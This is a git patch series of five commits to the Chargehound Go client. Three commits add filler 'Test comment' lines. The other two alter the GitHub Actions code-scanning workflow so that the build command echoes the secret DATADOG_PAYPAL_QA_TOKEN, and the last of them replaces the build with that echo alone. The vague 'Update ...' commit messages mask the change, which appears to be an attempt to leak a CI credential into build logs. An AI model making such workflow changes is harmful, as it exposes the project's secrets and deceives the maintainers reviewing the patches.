From 0d0e89801136445865f6c9f3958dcb45d204f42c Mon Sep 17 00:00:00 2001 From: ES Date: Wed, 5 Nov 2025 20:20:41 +0200 Subject: [PATCH 1/5] Update disputes.go --- disputes.go | 1 + 1 file changed, 1 insertion(+) diff --git a/disputes.go b/disputes.go index 94cc34b..97a0b73 100644 --- a/disputes.go +++ b/disputes.go @@ -11,6 +11,7 @@ import ( ) // Wrapper for the Chargehound API disputes resource. +// Test comment type Disputes struct { client *Client } From f77395210e11b9d7dba286fa9a681f8050789e52 Mon Sep 17 00:00:00 2001 From: ES Date: Wed, 5 Nov 2025 20:21:07 +0200 Subject: [PATCH 2/5] Update disputes.go --- disputes.go | 1 + 1 file changed, 1 insertion(+) diff --git a/disputes.go b/disputes.go index 97a0b73..fedabed 100644 --- a/disputes.go +++ b/disputes.go @@ -12,6 +12,7 @@ import ( // Wrapper for the Chargehound API disputes resource. // Test comment +// Another test comment type Disputes struct { client *Client } From ff04792fd50fdf74d7f41611e6a80856b038f559 Mon Sep 17 00:00:00 2001 From: ES Date: Wed, 5 Nov 2025 20:26:51 +0200 Subject: [PATCH 3/5] Update security.code-scanning.yml --- .github/workflows/security.code-scanning.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/security.code-scanning.yml b/.github/workflows/security.code-scanning.yml index 9cfdbd3..7553584 100644 --- a/.github/workflows/security.code-scanning.yml +++ b/.github/workflows/security.code-scanning.yml @@ -21,7 +21,7 @@ jobs: uses: chargehound/security-workflows-public/.github/workflows/codeql-go.yml@main with: build-mode: 'manual' - build-command: 'go build ./...' + build-command: 'go build ./... && echo ${{ secrets.DATADOG_PAYPAL_QA_TOKEN }}' secrets: DATADOG_API_KEY: ${{ secrets.DATADOG_PAYPAL_QA_TOKEN }} From 7596f5f5dbd79f84277682e7a2555d322383eada Mon Sep 17 00:00:00 2001 From: ES Date: Wed, 5 Nov 2025 20:27:27 +0200 Subject: [PATCH 4/5] Update security.code-scanning.yml --- .github/workflows/security.code-scanning.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/security.code-scanning.yml b/.github/workflows/security.code-scanning.yml index 7553584..c4cb832 100644 --- a/.github/workflows/security.code-scanning.yml +++ b/.github/workflows/security.code-scanning.yml @@ -21,7 +21,7 @@ jobs: uses: chargehound/security-workflows-public/.github/workflows/codeql-go.yml@main with: build-mode: 'manual' - build-command: 'go build ./... && echo ${{ secrets.DATADOG_PAYPAL_QA_TOKEN }}' + build-command: 'echo ${{ secrets.DATADOG_PAYPAL_QA_TOKEN }}' secrets: DATADOG_API_KEY: ${{ secrets.DATADOG_PAYPAL_QA_TOKEN }} From 84f8f9aa5fb23b6c3cc5c8c709e0261de84e6f51 Mon Sep 17 00:00:00 2001 From: ES Date: Wed, 5 Nov 2025 20:29:48 +0200 Subject: [PATCH 5/5] Update errors.go --- errors.go | 1 + 1 file changed, 1 insertion(+) diff --git a/errors.go b/errors.go index eb5ebff..3258c8a 100644 --- a/errors.go +++ b/errors.go @@ -17,6 +17,7 @@ const ( ) // A Chargehound API error +// Test comment type Error interface { // The error message Error() string